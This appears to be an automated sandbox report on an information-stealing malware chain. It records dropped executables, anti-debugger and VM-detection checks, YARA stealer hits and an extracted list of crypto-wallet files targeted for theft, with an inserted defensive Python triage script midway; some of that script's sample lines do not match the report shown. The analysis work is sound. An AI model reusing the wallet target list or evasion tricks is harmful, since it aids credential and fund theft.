Source: Amcache.hve.6.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.6.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.6.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VBoxService.exe
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: Amcache.hve.6.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: KKEBKJJD.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: KKEBKJJD.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: KKEBKJJD.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VMWare
Source: Amcache.hve.6.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: KKEBKJJD.0.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: KKEBKJJD.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: SIWVID
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Code function: 8_2_04C70C55 rdtsc 8_2_04C70C55
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C825FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C825FF0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C82C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C82C410
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 10_2_00255C0B mov eax, dword ptr fs:[00000030h] 10_2_00255C0B
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 10_2_00259972 mov eax, dword ptr fs:[00000030h] 10_2_00259972
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7FB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C7FB66C
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7FB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C7FB1F7
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe"
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\KJJJKFIIIJ.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe "C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe"
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe "C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe"
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process created: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe "C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe"
Source: KKEBKJJDGH.exe, KKEBKJJDGH.exe, 00000008.00000002.2439124494.0000000000441000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: SProgram Manager
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7FB341 cpuid 0_2_6C7FB341
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Queries volume information: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7C35A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C7C35A0
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 10_2_00225F10 LookupAccountNameA, 10_2_00225F10
Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: MsMpEng.exe
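The VM-artifact strings listed above and the anti-debugging evidence in this section mix two very different things: checks the sample itself performs (FindWindow probes for procmon/ollydbg class names, opening the NTICE/SICE/SIWVID SoftICE devices, looking for VBoxService.exe) and strings that only describe the sandbox host (everything sourced from Amcache.hve or a dropped *.dr file, plus the "Windows ... without Hyper-V" product-edition names, which are SKU labels rather than a virtualization check). The following script is an added example, not part of the report or of the malware's code: it parses the report's own "Source: <origin> <kind>: <value>" lines and buckets each value into an evasion family, keeping host-side artifacts apart. The indicator lists are taken from values shown in the report; the family names, the host/sample split rule and SAMPLE_LINES (copies of report lines, some with the origin list shortened to the file name) are mine.

```python
"""Triage anti-analysis evidence lines from a sandbox report (added example)."""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

LINE_RE = re.compile(
    r"^Source:\s+(?P<source>.+?)\s+"
    r"(?P<kind>Binary or memory string|Open window title or class name|File opened):\s+"
    r"(?P<value>.*)$"
)

# Window class / title names probed for analysis tools (FindWindow-style checks).
ANALYSIS_WINDOWS = {
    "regmonclass", "gbdyllo", "procmon_window_class", "ollydbg", "filemonclass",
    "process monitor - sysinternals: www.sysinternals.com",
    "registry monitor - sysinternals: www.sysinternals.com",
    "file monitor - sysinternals: www.sysinternals.com",
}
# Device names whose presence reveals a SoftICE-family kernel debugger.
SOFTICE_DEVICES = {"NTICE", "SICE", "SIWVID"}
# Hypervisor guest-agent process names the sample looks for.
VM_PROCESSES = {"vboxservice.exe"}
# Substrings identifying virtual hardware or a hypervisor vendor.
VM_ARTIFACT_PATTERNS = [
    re.compile(r"vmware|necvmwar|vmci", re.I),  # VMware products, SATA CD-ROM, VMCI bus
    re.compile(r"ven_15ad", re.I),              # PCI vendor ID 0x15AD = VMware
    re.compile(r"vbox|virtualbox", re.I),
    re.compile(r"hyper-v", re.I),  # "Hyper-V RAW" is a Winsock provider on plain Windows 10: weak alone
]
# "Windows ... Hyper-V" edition names are SKU labels, not a VM check; the odd
# leading byte seen in the dump ("8Windows", "%Windows") is a length prefix.
OS_EDITION_RE = re.compile(r"^.?Windows\s.*Hyper-V", re.I)


def parse_report_line(line: str) -> Optional[Tuple[str, str, str]]:
    """Return (origin file, evidence kind, value), or None for other line types."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    origin = m.group("source").split(",")[0].strip()  # first token: file name or path
    return origin, m.group("kind"), m.group("value")


def is_host_source(origin: str) -> bool:
    """Amcache.hve and *.dr files are written on the sandbox host, not by the sample."""
    return origin.startswith("Amcache.hve") or origin.endswith(".dr")


def classify(kind: str, value: str) -> Optional[str]:
    """Map one evidence value to an evasion family, or None if it is noise."""
    t = value.strip()
    if kind == "Open window title or class name":
        return "analysis_tool_window"
    if kind == "File opened":
        return "softice_device" if t.upper() in SOFTICE_DEVICES else "device_probe"
    if OS_EDITION_RE.match(t):
        return "os_edition_name"
    if t.lower() in ANALYSIS_WINDOWS:
        return "analysis_tool_window"
    if t.lower().lstrip("x") in VM_PROCESSES:  # dump shows "xVBoxService.exe" with a prefix byte
        return "vm_process"
    if any(p.search(t) for p in VM_ARTIFACT_PATTERNS):
        return "vm_artifact"
    return None


def summarize(lines: List[str]) -> Dict[str, List[str]]:
    """Group evidence values by family; host-side artifacts go to 'host_environment'."""
    out: Dict[str, set] = defaultdict(set)
    for line in lines:
        parsed = parse_report_line(line)
        if parsed is None:
            continue
        origin, kind, value = parsed
        family = classify(kind, value)
        if family is None:
            continue
        if is_host_source(origin):
            family = "host_environment"
        out[family].add(value.strip())
    return {k: sorted(v) for k, v in out.items()}


# Constructed test input: lines copied from the report, origins shortened.
SAMPLE_LINES = [
    "Source: EZrw1nNIpG.exe Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)",
    "Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)",
    "Source: EZrw1nNIpG.exe Binary or memory string: Hyper-V RAW",
    "Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual disk SCSI Disk Device",
    r"Source: Amcache.hve.6.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev",
    "Source: KKEBKJJD.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552",
    "Source: 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: xVBoxService.exe",
    "Source: 3eb62d09c2.exe Binary or memory string: VMWare",
    r"Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: procmon_window_class",
    r"Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: ollydbg",
    r"Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: NTICE",
    "Source: KKEBKJJDGH.exe Binary or memory string: SProgram Manager",
    r"Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Process queried: DebugPort",
]

if __name__ == "__main__":
    for family, values in sorted(summarize(SAMPLE_LINES).items()):
        print(f"{family}: {values}")
```

Run it on the full report text (one evidence line per element) and only the families other than os_edition_name and host_environment are evidence of evasion logic inside the sample; the HideFromDebugger, DebugPort and rdtsc records in this section are behavioural events rather than strings and are deliberately left unparsed here.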

Stealing of Sensitive Information

Source: Yara match File source: 15.2.explortu.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.explortu.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.explortu.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.explortu.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.KKEBKJJDGH.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.2445574299.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2703194358.0000000000221000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2440931537.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.3266423975.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2394722403.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.3310671212.0000000000221000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2438251859.0000000000251000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3418913450.0000000000221000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2486002500.0000000000221000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.2662971717.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 13.2.3eb62d09c2.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.EZrw1nNIpG.exe.810000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2385661873.0000000000811000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2514385520.0000000000D01000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2389921177.0000000001614000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2515715104.0000000001CF5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: EZrw1nNIpG.exe PID: 3792, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3eb62d09c2.exe PID: 7356, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.000000000095A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
